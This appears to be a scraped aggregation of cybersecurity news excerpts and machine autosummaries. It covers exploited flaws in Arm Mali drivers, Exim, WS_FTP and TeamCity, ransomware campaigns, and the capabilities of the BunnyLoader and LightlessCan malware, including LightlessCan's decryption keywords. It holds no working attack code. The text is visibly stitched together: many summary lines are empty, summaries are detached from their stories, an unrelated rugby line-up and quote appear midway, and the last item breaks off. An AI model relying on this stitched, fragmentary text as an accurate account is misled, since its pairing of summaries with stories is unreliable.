The most exposed countries in terms of how many organizations have at least one exposed ICSs in them are: United States Canada Italy United Kingdom France Netherlands Germany Spain Poland Sweden Global exposure of ICSs (BitSight) "Autosummary:
But with the increase in zero-day vulnerabilities, polymorphic malware, and Advanced Persistent Threats (APTs), there’s an argument for more frequent, even continuous, cybersecurity evaluations. Embracing the continuous monitoring approach across the board Beyond securing web applications, innovations like Endpoint Attack Surface Management (EASM) and Risk-Based Vulnerability Management (RBVM) have emerged as game changers for elevating an organization’s cybersecurity posture. Traditional web application pen testing vs. pen testing as a service Point-in-time assessments are like snap-shots taken at a particular instance of time. "Nutanix announced new features in the Nutanix Cloud Platform to strengthen organizations’ cyber resilience against ransomware attacks on unstructured data. These new features, available in Nutanix Data Lens and Nutanix Unified Storage solutions, enable organizations to detect a threat, defend from further damage and begin a 1-click recovery process within 20 minutes of exposure. The features build on the strength of Nutanix Cloud Platform to protect and secure customers’ most sensitive data across clouds. Ransomware … More
The post Nutanix strenghtens cyber resilience with ransomware detection and recovery features appeared first on Help Net Security.
"Autosummary:
“Understanding access to our data is very important for us to ensure data is secure, safe, and being used properly,” said Robert Pohjanen, IT Architect, LKAB. “Many organizations struggle with managing data protection across storage silos and clouds, especially when it comes to data governance and security,” said Thomas Cornely, SVP, Product Management at Nutanix. "Autosummary:
"Categories: Android Categories: News Tags: Google Tags: Android Tags: Qualcomm Tags: webp Tags: ARM Mali Tags: cve-2023-4863 Tags: cve-2023-4211 Tags: cve-2023-33106 Tags: cve-2023-33107 Tags: cve-2023-22071 Tags: cve-2023-33063 Tags: 2023-10-006 Tags: patch level Google has patched 53 vulnerabilities in its Android October security updates, two of which are known to be actively exploited. |
The post Update your Android devices now! Google patches two actively exploited vulnerabilities appeared first on Malwarebytes Labs.
"Autosummary:
In its own October security bulletin, chip manufacturer Qualcomm said that there are indications from Google Threat Analysis Group and Google Project Zero that CVE-2023-33106, CVE-2023-33107, CVE-2022-22071, and CVE-2023-33063 may be under limited, targeted exploitation.This vulnerability affects multiple versions of Arm Mali GPU drivers which are used in a broad range of Android device models, including on Android phones developed by Google, Samsung, Huawei, and Xiaomi, as well as in some Linux devices. "Categories: News Gen Z fears violence. Adults fear identity theft. And only about one-third of everyone is using antivirus. These are the cybersecurity and online privacy findings in Malwarebytes" latest research. |
The post Gen Z fears physical violence from being online more than anyone else, Malwarebytes finds appeared first on Malwarebytes Labs.
"Autosummary:
By polling 1,000 internet users aged 13 – 77 in North America, Malwarebytes can now reveal, across all age groups and not just for Gen Z: The 10 biggest concerns of going online , including hacked financial accounts, identity theft, and malware. The “version history” of the internet was split by what we could do online—simple browsing across Web 1.0’s static web pages, instant connection throughout Web 2.0’s social platforms, and, into the future, potential new forms of ownership within Web 3.0’s dreams of decentralization. "Board members often lack technical expertise and may not fully grasp cyber risks. On the other hand, CISOs are more accustomed to interfacing with IT staff. This is understandable; the board is responsible for guiding high-level decision-making. They rarely become involved with the details, leaving implementation plans and technical audits for the CISO to handle. The solution is effectively integrating the CISO into the C-suite and forming a collaborative relationship with the board. By using … More
The post Evolving conversations: Cybersecurity as a business risk appeared first on Help Net Security.
"Autosummary:
By tying security programs to concrete goals across risk, CX, growth, compliance, and resilience, organizations can shift perspectives and unlock additional resources. Armed with the right information, it is up to the CISO to bring the board members to the same page when it comes to securing their organizations, being prepared for worst case-scenario, while also translating cybersecurity measures as drivers towards meeting business outcomes and maximizing the organization’s impact. Making cybersecurity part of the business growth strategy Cybersecurity has evolved as threats have evolved, with new tools at attackers’ disposal such as FraudGPT, EvilGPT, and WormGPT. "Autosummary:
"A vulnerability (CVE-2023-4211) in the kernel drivers for several Mali GPUs “may be under limited, targeted exploitation,” British semiconductor manufacturer Arm has confirmed on Monday, when it released drivers updated with patches. Arm’s Mali GPUs are used on a variety devices, most prominently on Android phones by Google, Samsung, Huawei, Nokia, Xiaomi, Oppo, and other manufacturers. About CVE-2023-4211 CVE-2023-4211 stems from improper GPU memory processing and allows a local non-privileged to gain access to already … More
The post Zero-day in Arm GPU drivers exploited in targeted attacks (CVE-2023-4211) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Patches for the issues affecting Adreno GPU and Compute DSP drivers have been made available, and OEMs have been notified with a strong recommendation to deploy security updates as soon as possible" – Qualcomm The CVE-2022-22071 flaw was disclosed in May 2022 and is a high-severity (CVSS v3.1: 8.4) locally exploitable use after free bug impacting popular chips like the SD855, SD865 5G, and SD888 5G Qualcomm has not released any details on the actively exploited CVE-2023-33106, CVE-2022-22071, and CVE-2023-33063 flaws and will provide more information in its December 2023 bulletin. "Autosummary:
The libwebp library is used by a large number of projects for encoding and decoding images in the WebP format, including modern web browsers like Safari, Mozilla Firefox, Microsoft Edge, Opera, and the native Android web browsers, as well as popular apps like 1Password and Signal. "Autosummary:
"Autosummary:
"Autosummary:
"Our successful exploitation, leading to full root privileges on major distributions like Fedora, Ubuntu, and Debian, highlights this vulnerability’s severity and widespread nature," said Saeed Abbasi, Product Manager at Qualys" Threat Research Unit. "Autosummary:
"Autosummary:
"Cybersecurity researchers spotted a new malware-as-a-service (MaaS) called BunnyLoader that’s appeared in the threat landscape. Zscaler ThreatLabz researchers discovered a new malware-as-a-service (MaaS) that is called BunnyLoader, which has been advertised for sale in multiple cybercrime forums since September 4, 2023. The BunnyLoader malware loader is written in C/C++ and is sold on various forums for $250 for […]
The post BunnyLoader, a new Malware-as-a-Service advertised in cybercrime forums appeared first on Security Affairs.
"Autosummary:
The BunnyLoader panel supports multiple features such as: downloading and executing additional malware keylogging stealing credentials manipulating a victim’s clipboard to steal cryptocurrency running remote commands on the infected machine providing statistics for infections displaying the total connected/disconnected clients monitoring active tasks logging stealer’s activities The researchers have yet to discover the distribution channel for malware, but they analyzed the activity of the malware upon execution. "Researchers have identified the exfiltration infrastructure of a LockBit affiliate while investigating a LockBit extortion incident that occurred in Q3 2023. Executive Summary NOTE: This version of the report has been redacted for TLP:WHITE disclosure. Introduction Digging into ransomware infections always provides valuable insights. This time, we investigated peculiar details of a recent Lockbit-based intrusion […]
The post Exclusive: Lighting the Exfiltration Infrastructure of a LockBit Affiliate (and more) appeared first on Security Affairs.
"Autosummary:
Such servers have been deployed in 16 countries spread worldwide: Russia, Netherlands, Finland, United States, Kazakhstan, Turkey, Ukraine, Czech Republic, Latvia, Norway, Poland, Romania, Uzbekistan, Germany, France, and Greece. So, with a good degree of confidence, we are looking at multiple instances generated from the same base image, likely linked to a single organization, and the extension of this linked infrastructure involves more than 8 thousand hosts worldwide, and at least a third of it is located in CIS countries. The full report containing the Indicator of Compromise (IoCs) and details on the exfiltration infrastructure is available here: https://medium.com/@lcam/lighting-the-exfiltration-infrastructure-of-a-lockbit-affiliate-and-more-f57fbb7a4e79 About the author: Luca Mella, Cyber Security Expert, Response & Threat Intel | Manager In 2019, Luca was mentioned as one of the “32 Influential Malware Research Professionals”.In fact, since 2019, the hostname has linked a wide range of eCrime activities such as ransomware and data extortions, info-stealing malware spreading, botnet infections, and scams. "Researchers from cybersecurity firm TG Soft are warning Italian entities and companies of LockBit 3.0 Black and BlackCat/AlphV attacks. In the last few weeks, two cybercriminal groups that have also targeted Italian entities and businesses, are back in the news; they are LockBit 3.0 Black and BlackCat/AlphV, which had already been reported by the media in the first decade of […]
The post Two hacker groups are back in the news, LockBit 3.0 Black and BlackCat/AlphV appeared first on Security Affairs.
"Autosummary:
Obviously, as with any other software, its effectiveness and efficiency is subject to the 4 rules of good use: Correctly INSTALLED on ALL PCs as well as on Server(s) even if they are not used for WEB browsing; Correctly CONFIGURED; Correctly UPDATED; and properly USED… More info on TG Soft’s Heuristic Behavioral technologies take a look at: https://www.tgsoft.it/news/news_archivio.asp?id=1470&lang=eng Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Lockbit) "The European Telecommunications Standards Institute (ETSI) disclosed a data breach, threat actors had access to a database of its users. Threat actors stole a database containing the list of users of the portal of the European Telecommunications Standards Institute (ETSI). The European Telecommunications Standards Institute is an independent, not-for-profit organization based in Europe. The organization […]
The post European Telecommunications Standards Institute (ETSI) suffered a data breach appeared first on Security Affairs.
"Autosummary:
The organization focuses on developing global standards for information and communications technology (ICT) and telecommunications, such as: GSM™, TETRA, 3G, 4G, 5G, DECT™. "Autosummary:
"Autosummary:
It could include: Loss of access to your devices/machines (if they become compromised with malware) Loss of access to your social media accounts Financial loss due to stolen card details or scams which trick you into sending money/buying fraudulently advertised items Psychological distress from suffering a breach or scam Time and money spent trying to reclaim fraudulently obtained funds The administrative burden of regaining access and resetting account passwords across multiple accounts Physical danger, if smart home security cameras and child monitors are hijacked The scale of some cybercrime categories is astonishing.We trust others to guard our most sensitive data: Even if we secure our devices and online accounts, what happens to the personal and financial information we entrust with our insurer, healthcare organization, bank, cloud storage provider or other business?Deployed primarily in phishing messages, the end goal is usually to trick the victim into handing over their logins, personal information or card details, or getting them to click a link which could download malware to your machine or device.TVs, refrigerators, security cameras, speakers – you name the appliance and you can usually buy a version which is connected to the internet and sports a computer chip for processing data. "Online fraud is a pervasive and constantly evolving threat that affects individuals and organizations worldwide. Online fraudsters often leverage the anonymity and convenience of the internet to exploit vulnerabilities, manipulate victims, and conceal their true identities. Their fraudulent activities may result in financial losses, reputational damage, or privacy breaches for those who fall prey to their schemes. In this Help Net Security round-up, cybersecurity experts talk about online fraud and damaging effects it has on … More
The post Online fraud can cost you more than money appeared first on Help Net Security.
"Autosummary:
"According to Fortinet, ransomware activity has intensified, registering an increase of 13 times compared to the beginning of 2023 in terms of all malware detections. The rise of Ransomware-as-a-Service has primarily driven this surge in ransomware variations. According to a recent study, 65% of organizations identified ransomware as one of their top three threats to their operational viability. Additionally, ransomware is the most significant threat for 13% of these organizations. Here’s a collection of free … More
The post 9 essential ransomware guides and checklists available for free appeared first on Help Net Security.
"Autosummary:
This guide includes two primary resources: Ransomware and Data Extortion Prevention Best Practice Ransomware and Data Extortion Response Checklist Mitigating malware and ransomware attacks This guidance from the National Cyber Security Centre UK helps private and public sector organizations deal with malware’s effects (including ransomware). "Autosummary:
Some of the other stealers hosted on GitHub include Stealerium, Impost3r, Blank-Grabber, Nivistealer, Creal-stealer, and cstealer. "Autosummary:
"As the "update" runs, the phone remains unusable to the point that it can"t be locked or unlocked, as the malware monitors those attempts and blocks them," Kaspersky noted. "SymphonyAI announced the Sensa Investigation Hub, a generative AI-enabled investigation and case management platform that propels financial institutions into the future of financial crime management. The Sensa Investigation Hub uses predictive and generative AI technology with unparalleled global domain risk and compliance expertise, culminating in an enterprise-wide, next-generation investigation platform that delivers up to 70% increased investigator productivity. Building on the industry leadership of the Sensa Copilot for financial crime investigators introduced earlier this year … More
The post SymphonyAI accelerates financial crime investigations with generative AI technology appeared first on Help Net Security.
"Autosummary:
"Progress Software, the company behind the recently hacked MOVEit file-sharing tool, has recently fixed two critical vulnerabilities (CVE-2023-40044, CVE-2023-42657) in WS_FTP Server, another popular secure file transfer solution. Proof-of-concept code for CVE-2023-40044 has been available since Friday, and Rapid7 researchers have observed multiple instances of WS_FTP exploitation in the wild, with two different attack chains. The exploited vulnerability (CVE-2023-40044) and the update CVE-2023-40044 is a .NET deserialization vulnerability that could allow an unauthenticated threat actor … More
The post Critical vulnerability in WS_FTP Server exploited by attackers (CVE-2023-40044) appeared first on Help Net Security.
"Autosummary:
Progress Software, the company behind the recently hacked MOVEit file-sharing tool, has recently fixed two critical vulnerabilities (CVE-2023-40044, CVE-2023-42657) in WS_FTP Server, another popular secure file transfer solution. "Since July 2023, the Federal Bureau of Investigation (FBI) has noticed a new trend: dual ransomware attacks on the same victim, occurring in close proximity of one another. Dual ransomware attacks Dual ransomware attacks are when attacks against the same victim occurr within 10 days (or less) of each other. According to the FBI, most of these occurred within 48 hours of each other. “During these attacks, cyber threat actors deployed two different ransomware variants … More
The post Most dual ransomware attacks occur within 48 hours appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" The disclosure comes as proof-of-concept (PoC) exploit code has surfaced for a pair of now-patched flaws in Microsoft SharePoint Server – CVE-2023-29357 (CVSS score: 9.8) and CVE-2023-24955 (CVSS score: 7.2) – that could be chained to achieve privilege escalation and remote code execution. "Autosummary:
The following driver versions are impacted by the vulnerability: Midgard GPU kernel driver: All versions from r12p0 to r32p0 Bifrost GPU kernel driver: All versions from r0p0 to r42p0 Valhall GPU kernel driver: All versions from r19p0 to r42p0 Arm 5th Gen GPU architecture kernel driver: All versions from r41p0 to r42p0 Midgard, Bifrost, and Valhall series were introduced in 2013, 2016, and 2019, respectively, so they concern older device models. "Autosummary:
Motel One is a low-budget hotel chain that operates over ninety hotels with 25,000 rooms in Germany, Austria, the UK, Denmark, Belgium, the Netherlands, Spain, Poland, the Czech Republic, and the United States. "Autosummary:
"This Phantom Hacker scam is an evolution of more general tech support scams, layering imposter tech support, financial institution, and government personas to enhance the trust victims place in the scammers and identify the most lucrative accounts to target," the FBI said. "Eclypsium launches new threat detection capabilities for network appliances to its Eclypsium supply chain security platform. Over the past summer, ransomware groups including Akira, CACTUS, FIN8, and LockBit have been observed attacking network appliances from a number of vendors, looking to evade endpoint security and maintain persistence within target environments. In addition, state-sponsored adversaries continue to target network devices, with the NSA and CISA recently issuing an advisory about the BlackTech group targeting network routers … More
The post Eclypsium’s threat detection capabilities defend network infrastructure from cybercriminals appeared first on Help Net Security.
"Autosummary:
"Six zero-days in Exim, the most widely used mail transfer agent (MTA), have been revealed by Trend Micro’s Zero Day Initiative (ZDI) last Wednesday. Due to what seems to be insufficient information and poor communication, fixes for only three of them have been included in Exim v4.96.1, a security release made available today. Exim is a good target The popularity of Exim is not surprising: it’s free, efficient, highly configurable, regularly updated, and often probed … More
The post Critical zero-days in Exim revealed, only 3 have been fixed appeared first on Help Net Security.
"Autosummary:
CVE-2023-42115, along with CVE-2023-42116 (a SMTP challenge stack-based buffer overflow bug) and CVE-2023-42114 (a NTLM challenge out-of-bounds read) have been fixed in Exim v4.96.1 and the latest v4.97 release candidates. "Autosummary:
Apart from the mentioned functions, the malware also features modules to steal data stored on web browsers (passwords, credit cards, browsing history), cryptocurrency wallets, VPNs, messaging apps, and more, essentially acting as a standard info-stealer. In its current state, BunnyLoader is sold for $250, while the "private stub" version, which features stronger anti-analysis, in-memory injection, AV evasion, and additional persistence mechanisms, sells for $350. "Autosummary:
Vulnerable TeamCity servers (Shadowserver Foundation) Targets set on vulnerable TeamCity servers Just days after Sonar published their blog post, multiple attackers started exploiting this critical auth bypass flaw, according to threat intelligence companies GreyNoise and PRODAFT. "Autosummary:
WS_FTP Server instances exposed online (Shodan) Exploited in the wild The day the PoC exploit was released, cybersecurity company Rapid7 also revealed that attackers began exploiting CVE-2023-40044 on Saturday evening, September 30. "Autosummary:
" For users who still see this false positive, Microsoft provided a clear set of instructions to update and clear any previous flags: Open the command prompt as an administrator. "Autosummary:
"Experts warn of threat actors actively exploiting CVE-2023-40044 flaw in recently disclosed flaw in Progress Software’s WS_FTP products. Progress Software recently warned customers to address a critical severity vulnerability, tracked as CVE-2023-40044 (CVSS score 10), in its WS_FTP Server software which is used by thousands of IT teams worldwide. The vulnerability was discovered by researchers at the […]
The post WS_FTP flaw CVE-2023-40044 actively exploited in the wild appeared first on Security Affairs.
"Autosummary:
WS_FTP flaw CVE-2023-40044 actively exploited in the wild Pierluigi Paganini October 02, 2023 October 02, 2023 Experts warn of threat actors actively exploiting CVE-2023-40044 flaw in recently disclosed flaw in Progress Software’s WS_FTP products. "The National Logistics Portal (NLP), a newly launched platform to manage all port operations in India, left public access to sensitive data, posing the risk of a potential takeover by threat actors. On September 24th, researchers discovered that the NLP platform was exposing sensitive credentials, secrets, and encryption keys via publicly available JS files. In […]
The post National Logistics Portal (NLP) data leak: seaports in India were left vulnerable to takeover by hackers appeared first on Security Affairs.
"Autosummary:
National Logistics Portal (NLP) data leak: seaports in India were left vulnerable to takeover by hackers Pierluigi Paganini October 02, 2023 October 02, 2023 The National Logistics Portal (NLP), a newly launched platform to manage all port operations in India, left public access to sensitive data, posing the risk of a potential takeover by threat actors. "Experts warn that the recent attack on building automation giant Johnson Controls may have exposed data of the Department of Homeland Security (DHS). Johnson Controls International plc is a multinational conglomerate with a diversified portfolio of products and services primarily focused on building technologies and solutions. The company provides HVAC (heating, ventilation, and air conditioning), […]
The post Ransomware attack on Johnson Controls may have exposed sensitive DHS data appeared first on Security Affairs.
"Autosummary:
The company provides HVAC (heating, ventilation, and air conditioning), solutions for building automation, fire and security systems, and components for energy management. "Autosummary:
"Ransomware attacks have been ramping up in 2023 and reinfections are occurring all over the globe, forcing lean IT teams to prepare. |
The post Ransomware reinfections on the rise from improper remediation appeared first on Malwarebytes Labs.
"Autosummary:
Once cybercriminals gain entry, they’ll look to further infiltrate the organization by searching for vulnerabilities, escalating privileges, reconfiguring security controls, stealing additional credentials, and exfiltrating other sensitive data.Any corporation that is lacking in IT staff, budget, resources, or time to investigate and prioritize cyberthreats could be at risk: A single ransomware attack can cause massive financial, logistical, and reputational damage—sometimes enough to shutter a business for good. Ways to avoid ransomware reinfection While a numbered list could never replace our remediation experts, there are a few tried-and-true, high-level actions that resource-constrained IT teams can take to help protect against ransomware attacks, whether it’s the first or sixth time getting hit. After cleaning all remnants of the attack from the network, security experts recommended password resets for all privileged, non-privileged, and service accounts, as well as two-factor authentication (2FA) for VPN and email access. Neglecting to reset credentials: Once systems have been recovered and cleaned, and it’s confirmed the network is secure, SMBs should reset all passwords for privileged, non-privileged, and third-party accounts. Once access to the email was terminated in the initial remediation with Microsoft, the bad guys began using Nebula and audience response systems (ARS) to continue the attack, running commands, disabling protections, and changing policies.Even after mitigating a ransomware attack, hidden doors may remain unnoticed, enabling threat actors to reactivate dormant artifacts or use access that was previously attained through stolen credentials, backdoors, or reconfigurations.Just a few days after the MDR analyst helped the new customer identify and remove additional ransomware, an unencountered persistent mechanism was discovered, triggering a threat hunt that revealed even more hidden gems: two compromised domain admin accounts, a domain controller, and an SQL server.However, if onboarding a security partner during incident response, they should provide subject matter expertise and technical support, ensure that the threat actors are eradicated from the network, and catch residual issues that could result in follow-up compromise once the incident is closed. "Categories: News Categories: Ransomware Tags: FBI Tags: ransomware Tags: dual attacks Tags: wipers The FBI has warned about new tactics deployed by ransomware gangs, dual attacks and use of wipers. |
The post FBI warns of multiple ransomware attacks on same victim appeared first on Malwarebytes Labs.
"Autosummary:
With multiple, or dual ransomware attacks, the FBI says cybercriminals deployed two different ransomware variants against victim companies, using the following variants: AvosLocker, Diamond, Hive, Karakurt, LockBit, Quantum, and Royal. Rivalry between ransomware gangs Initial Access Brokers selling to multiple ransomware operators Extra pressure on the victim to pay the ransom The second trend, according to the FBI, is that multiple ransomware groups have increased the use of custom data theft, wiper tools, and malware to pressure victims to negotiate. Information about your company, such as industry, size, etc. Victim impact statement. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: How global enterprises navigate the complex world of data privacy In this Help Net Security interview, Evelyn de Souza, Head of Privacy Compliance, Oracle SaaS Cloud, talks about the constant efforts required to keep up with privacy laws in each country, and ensuring compliance across the entire organization. MITRE ATT&CK project leader on why the framework remains vital for cybersecurity … More
The post Week in review: Chrome zero-day is actually in libwebp, Sony hacking rumours appeared first on Help Net Security.
"Autosummary:
Guide: SaaS Offboarding Checklist Download this template from Nudge Security for the essential steps of IT offboarding in the age of SaaS. New infosec products of the week: September 29, 2023 Here’s a look at the most interesting products from the past week, featuring releases from AlphaSOC, Baffle, Immersive Labs, OneTrust, Panzura, runZero, and SeeMetrics.Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: How global enterprises navigate the complex world of data privacy In this Help Net Security interview, Evelyn de Souza, Head of Privacy Compliance, Oracle SaaS Cloud, talks about the constant efforts required to keep up with privacy laws in each country, and ensuring compliance across the entire organization. "Autosummary:
When executed, LostTrust will disable and stop numerous Windows services to ensure all files can be encrypted, including any services containing the Firebird, MSSQL, SQL, Exchange, wsbex, postgresql, BACKP, tomcat, SBS, and SharePoint strings." BleepingComputer also found that both the LostTrust [VirusTotal] and MetaEncryptor [VirusTotal] encryptors are virtually identical, with some minor changes to ransom notes, embedded public keys, ransom note names, and encrypted file extensions. "Autosummary:
"Autosummary:
"Autosummary:
"The U.S. Federal Bureau of Investigation (FBI) warns of dual ransomware attacks aimed at the same victims. The U.S. Federal Bureau of Investigation (FBI) is warning of dual ransomware attacks, a new worrisome trend in the threat landscape that sees threat actors targeting the same victims two times. “As of July 2023, the FBI noted […]
The post FBI warns of dual ransomware attacks appeared first on Security Affairs.
"Autosummary:
The government experts observed the threat actors using the following ransomware families: AvosLocker, Diamond, Hive, Karakurt, LockBit, Quantum, and Royal. "A child abuse site has been taken down following a request to German law enforcement by Cybernews research team. A hacker collective, who wanted to remain anonymous, has been relentlessly hunting online crooks who benefit from videos of children being abused. This week, they discovered a website dedicated to pedophiles – it was full of […]
The post Child abuse site taken down, organized child exploitation crime suspected – exclusive appeared first on Security Affairs.
"Autosummary:
Following a tip off by the source, Cybernews also contacted German law enforcement, namely, the BKA, Germany’s internal security organization, with a request to take down the site as soon as possible. "Autosummary:
Line-ups Argentina: Bogado, Isgro, Cinti, De la Fuente, Imhoff, Sanchez, Cubelli; Sclavi, Creevy, Bello, Pagadizabal, Rubiolo, Gonzalez, Kremer, Isa Replacements: Ruiz, Vivas, Gomez Kodela, Alemanno, Oviedo, Bazan Velez, Carreras, Cruz Mallia Chile: Ayarza, Videla, Saavedra, Garafulic, Ignacio Larenas, Fernandez, Torrealba; Carrasco, Bohme, Dittus, Pedrero, Eissmann, Sigren, Saavedra, Martinez Replacements: Dussaillant, Lues, Inostroza, Sarmiento, Escobar, Silva, Herreros, Urroz Referee: Paul Williams (New Zealand) "The ALPHV/BlackCat ransomware gang added the hotel chain Motel One to the list of victims on its Tor leak site. Motel One is a German hotel chain that offers budget-friendly accommodations primarily targeted at business and leisure travelers. It is known for its stylish and design-focused hotels that aim to provide a comfortable and affordable […]
The post ALPHV/BlackCat ransomware gang hacked the hotel chain Motel One appeared first on Security Affairs.
"Autosummary:
The Alphv ransomware group has been very active in this period, recently it claimed to have hacked Clarion, the global manufacturer of audio and video equipment for cars and other vehicles BlackCat/ALPHV ransomware gang has been active since November 2021, the list of its victims is long and includes industrial explosives manufacturer SOLAR INDUSTRIES INDIA, the US defense contractor NJVC, gas pipeline Creos Luxembourg S.A., the fashion giant Moncler, the Swissport, NCR, and Western Digital. "Autosummary:
" "We got more positives than negatives out of this" Chile qualified for their first World Cup by beating the United States 52-51 in a two-legged qualification play-off in July 2022, becoming the first debutants in the competition since Portugal in 2007, which was history in itself. "The growing complexity of compliance regulations and ever-evolving criminal methodologies are a major difficulty for financial institutions, according to LexisNexis Risk Solutions. Global financial crime compliance costs for financial institutions exceed $206 billion. This cost is comparable to more than 12% of global research and development (R&D) expenditure and equates to $3.33 per month for each working-age individual on earth. Financial crime professionals embrace AI While certain industries are still determining the ways in which … More
The post Financial crime compliance costs exceed $206 billion appeared first on Help Net Security.
"Autosummary:
However, similar to historical changes in ways of working, problems with data quality, data silos, outdated legacy systems, and a lack of collaboration internally can create avoidable compliance activity and expenditure. "The California State Legislature passed Senate Bill 362, known as the Delete Act, to simplify the process for consumers to ask to remove their personal data gathered by data brokers. In this Help Net Security video, Dr. Chris Pierson, CEO of BlackCloak, discusses why this bill matters to CISOs. This new law will set the stage for better regulation and transparency. It will finally give consumers the right to delete.
The post Why California’s Delete Act matters for the whole country appeared first on Help Net Security.
"Autosummary:
"Despite the economic uncertainty and inflation, security budgets generally continued to rise but at a lower rate than prior years, according to new research from IANS and Artico Search. Security budgets increase by 6% in 2023 Respondents reported an average security budget increase of 6%, a significant decrease from the 17% increase in the previous budget cycle and marks a 65% reduction in growth. Across industries, the decline was most prominent in technology firms, which … More
The post Cybersecurity budgets show moderate growth appeared first on Help Net Security.
"Autosummary:
Compared to publicly listed companies, not-for-profit organizations, and other forms of private enterprises, VC-backed firms have an outsized security budget percentage, averaging nearly 30%, which is more than 2x the overall percentage. "Autosummary:
"VMware customers have growing concerns about the state of the virtualization software and the company behind it – ranging from rising licensing costs, ransomware vulnerabilities and a diminishing quality of support, according to VergeIO. 84% of respondents indicated that they were concerned about VMware’s current and future costs, with many highlighting “per-core” renewal quotes and licensing agreements that require a commitment to year-over-year spending increases as additional points of distress. With a rise in ransomware … More
The post VMware users anxious about costs and ransomware threats appeared first on Help Net Security.
"Autosummary:
"US CISA added the flaw CVE-2018-14667 in Red Hat JBoss RichFaces Framework to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added the critical flaw CVE-2018-14667 (CVSS score 9.8) affecting Red Hat JBoss RichFaces Framework to its Known Exploited Vulnerabilities Catalog. The issue is an Expression Language (EL) injection via the UserResource resource, […]
The post CISA adds JBoss RichFaces Framework flaw to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
"Autosummary:
The malware replicates many native Windows commands like ping, ipconfig, netstant, mkdir, schstasks, systeminfo, etc., so it can execute them without appearing in the system console for better stealthiness against real-time monitoring tools. "Nexusflow announced that it has raised a $10.6 million seed round led by Point72 Ventures, with participation from Fusion Fund and several AI luminaries in Silicon Valley. Nexusflow was founded by AI experts Professor Jiantao Jiao and Professor Kurt Keutzer from the Berkeley AI Research (BAIR) Lab, along with industry AI leader Jian Zhang. Jian Zhang received his Ph.D. from the Stanford AI Lab and served as the former Machine Learning Director at SambaNova Systems, … More
The post Nexusflow raises $10.6 million to improve generative AI in cybersecurity appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"The attacker, masquerading as the hotel, reaches out to the customer through the booking site, urging the customer to "re-confirm their credit card," then steals the customer"s information," Akamai researcher Shiran Guez said, noting how the attacks prey on the victim"s sense of urgency to pull off the operation.Supercharge Your Skills Cofense, in a report published this week, said the hospitality sector has been at the receiving end of a "well-crafted and innovative social engineering attack" that"s designed to deliver stealer malware such as Lumma Stealer, RedLine Stealer, Stealc, Spidey Bot, and Vidar. "China-linked threat actors stole around 60,000 emails from U.S. State Department after breaching Microsoft’s Exchange email platform in May. China-linked hackers who breached Microsoft’s email platform in May have stolen tens of thousands of emails from U.S. State Department accounts, a Senate staffer told Reuters this week. During a briefing by U.S. State Department IT officials, […]
The post Chinese threat actors stole around 60,000 emails from US State Department in Microsoft breach appeared first on Security Affairs.
"Autosummary:
Chinese threat actors stole around 60,000 emails from US State Department in Microsoft breach Pierluigi Paganini September 29, 2023 September 29, 2023 China-linked threat actors stole around 60,000 emails from U.S. State Department after breaching Microsoft’s Exchange email platform in May. "Autosummary:
"Autosummary:
Found by an anonymous security researcher and disclosed through Trend Micro"s Zero Day Initiative (ZDI), the security bug (CVE-2023-42115) is due to an Out-of-bounds Write weakness found in the SMTP service. "Autosummary:
Although this exploit does not grant attackers remote code execution, as it does not cover the entire exploit chain demonstrated at Pwn2Own Vancouver, the author clarifies that attackers could potentially combine it with the CVE-2023-24955 command injection bug to achieve this objective. "Autosummary:
Thus, when a file is uploaded, the website returns a malicious binary that masquerades as a PDF with a double extension ".pdf.exe" that, upon execution, harvests sensitive information from infected hosts. "Autosummary:
Cybersecurity firms, journalists, and law enforcement also released interesting reports this week: Contributors and those who provided new ransomware information and stories this week include @serghei, @Ionut_Ilascu, @BleepinComputer, @fwosar, @Seifreed, @demonslay335, @billtoulas, @LawrenceAbrams, @malwrhunterteam, @MalGamy12, @billseagull, @coveware, @GroupIB_TI, @briankrebs, @pcrisk, @FBI, @jgreigj, and @DrWeb_antivirus.During this time, the attackers claim to have stolen DWG files, engineering documents, databases, confidential documents, and client contracts. "Categories: Exploits and vulnerabilities Categories: News Google has updated its Chrome Stable Channel to fix, among other things, an actively exploited vulnerability |
The post Update Chrome now! Google patches another actively exploited vulnerability appeared first on Malwarebytes Labs.
"Autosummary:
Posted: September 29, 2023 by Google has updated its Chrome Stable Channel to fix, among other things, an actively exploited vulnerability Google has updated the Stable Channel for Chrome to 117.0.5938.132 for Windows, Mac and Linux.The exploitation occurs when a program uses one method to allocate or initialize a resource, but an incompatible method then accesses that resource, potentially providing unsecured access to the browser’s memory. "Experts warn of a critical zero-day vulnerability, tracked as CVE-2023-42115, in all versions of Exim mail transfer agent (MTA) software. A critical zero-day vulnerability, tracked as CVE-2023-42115 (CVSS score 9.8), affects all versions of Exim mail transfer agent (MTA) software. A remote, unauthenticated attacker, can exploit the vulnerability to gain remote code execution (RCE) on Internet-exposed […]
The post A still unpatched zero-day RCE impacts more than 3.5M Exim servers appeared first on Security Affairs.
"Autosummary:
A still unpatched zero-day RCE impacts more than 3.5M Exim servers Pierluigi Paganini September 29, 2023 September 29, 2023 Experts warn of a critical zero-day vulnerability, tracked as CVE-2023-42115, in all versions of Exim mail transfer agent (MTA) software. "Autosummary:
Execution chain 3: LightlessCan (complex version) The most complex chain we observed on the compromised system also delivers LightlessCan, with various components involved in the complete chain of installation stages: a legitimate application, an initial dropper, a complete dropper (which contains the configuration), an intermediate dropper, a configuration file, a file with system information (for the decryption of encrypted payloads on the file system), an intermediate loader and the final step, the LightlessCan RAT. As in the previous cases, three long keywords must be provided to decrypt the embedded payload: the name of the parent process ( tabcal.exe ), the internal parameter hardcoded in the binary ( 9zCnQP6o78753qg8 ), and the external parameter ( LocalServiceNetworkRestricted ) – this time not expressed as a command line parameter, but instead as the content of a file located at %WINDOWS%\system32\thumbs.db .Note that the length of the keywords are not all exactly 16 bytes, but the decryption process will still work if the oversized string is truncated to a 16-byte length (for instance, AudioEndpointBuilder to AudioEndpointBui), and the undersized string, fixmapi.exe, is treated as fixmapi.exe\x00\x00\x00\x00\x00, because the string was initialized as 260 instances of the NUL character.Summary of binaries involved in the attack Location directory Legitimate parent process Malicious side-loaded DLL Trojanized project (payload) C:\ProgramShared\ 